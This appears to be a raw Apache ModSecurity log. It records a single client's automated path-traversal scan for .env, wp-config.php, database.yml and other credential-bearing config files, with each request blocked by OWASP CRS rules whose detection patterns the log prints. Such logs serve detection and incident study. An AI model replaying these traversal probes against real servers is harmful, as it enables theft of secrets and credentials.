[Tue May 12 05:31:18.390795 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfBdr1yOh9TvizezigVwAAAE8"]
[Tue May 12 05:31:18.435014 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKfBtr1yOh9TvizezigWAAAAE8"]
[Tue May 12 05:31:18.435217 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKfBtr1yOh9TvizezigWAAAAE8"]
[Tue May 12 05:31:19.225267 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfBtr1yOh9TvizezigWAAAAE8"]
[Tue May 12 05:31:19.269214 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKfB9r1yOh9TvizezigWQAAAE8"]
[Tue May 12 05:31:19.269285 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKfB9r1yOh9TvizezigWQAAAE8"]
[Tue May 12 05:31:19.269449 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKfB9r1yOh9TvizezigWQAAAE8"]
[Tue May 12 05:31:20.053486 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfB9r1yOh9TvizezigWQAAAE8"]
[Tue May 12 05:31:20.096975 2026] [core:error] [pid 1825179:tid 1825213] [client 45.148.10.247:51002] AH10244: invalid URI path (/files../../../.env)
[Tue May 12 05:31:21.116259 2026] [core:error] [pid 1825179:tid 1825206] [client 45.148.10.247:51010] AH10244: invalid URI path (/files../../../../.env)
[Tue May 12 05:31:22.361192 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKfChs7kySIUZ3ORnImOQAAAQY"]
[Tue May 12 05:31:22.361277 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKfChs7kySIUZ3ORnImOQAAAQY"]
[Tue May 12 05:31:22.361466 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKfChs7kySIUZ3ORnImOQAAAQY"]
[Tue May 12 05:31:23.161271 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfChs7kySIUZ3ORnImOQAAAQY"]
[Tue May 12 05:31:23.199307 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKfCxs7kySIUZ3ORnImOgAAAQY"]
[Tue May 12 05:31:23.199378 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKfCxs7kySIUZ3ORnImOgAAAQY"]
[Tue May 12 05:31:23.199545 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKfCxs7kySIUZ3ORnImOgAAAQY"]
[Tue May 12 05:31:23.975261 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfCxs7kySIUZ3ORnImOgAAAQY"]
[Tue May 12 05:31:24.013576 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKfDBs7kySIUZ3ORnImOwAAAQY"]
[Tue May 12 05:31:24.013653 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKfDBs7kySIUZ3ORnImOwAAAQY"]
[Tue May 12 05:31:24.013823 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKfDBs7kySIUZ3ORnImOwAAAQY"]
[Tue May 12 05:31:24.802520 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfDBs7kySIUZ3ORnImOwAAAQY"]
[Tue May 12 05:31:24.840905 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKfDBs7kySIUZ3ORnImPAAAAQY"]
[Tue May 12 05:31:24.841119 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKfDBs7kySIUZ3ORnImPAAAAQY"]
[Tue May 12 05:31:25.650213 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfDBs7kySIUZ3ORnImPAAAAQY"]
[Tue May 12 05:31:25.687649 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKfDRs7kySIUZ3ORnImPQAAAQY"]
[Tue May 12 05:31:25.687856 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKfDRs7kySIUZ3ORnImPQAAAQY"]
[Tue May 12 05:31:26.482236 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfDRs7kySIUZ3ORnImPQAAAQY"]
[Tue May 12 05:31:26.520440 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKfDhs7kySIUZ3ORnImPgAAAQY"]
[Tue May 12 05:31:26.520655 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKfDhs7kySIUZ3ORnImPgAAAQY"]
[Tue May 12 05:31:27.315451 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfDhs7kySIUZ3ORnImPgAAAQY"]
[Tue May 12 05:31:27.352865 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKfDxs7kySIUZ3ORnImQQAAAQY"]
[Tue May 12 05:31:27.352945 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKfDxs7kySIUZ3ORnImQQAAAQY"]
[Tue May 12 05:31:27.353113 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKfDxs7kySIUZ3ORnImQQAAAQY"]
[Tue May 12 05:31:27.763975 2026] [security2:error] [pid 1820198:tid 1820201] [client 43.134.51.171:53872] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agKfD81tk6y7yBJLpJo6jgAAAIE"]
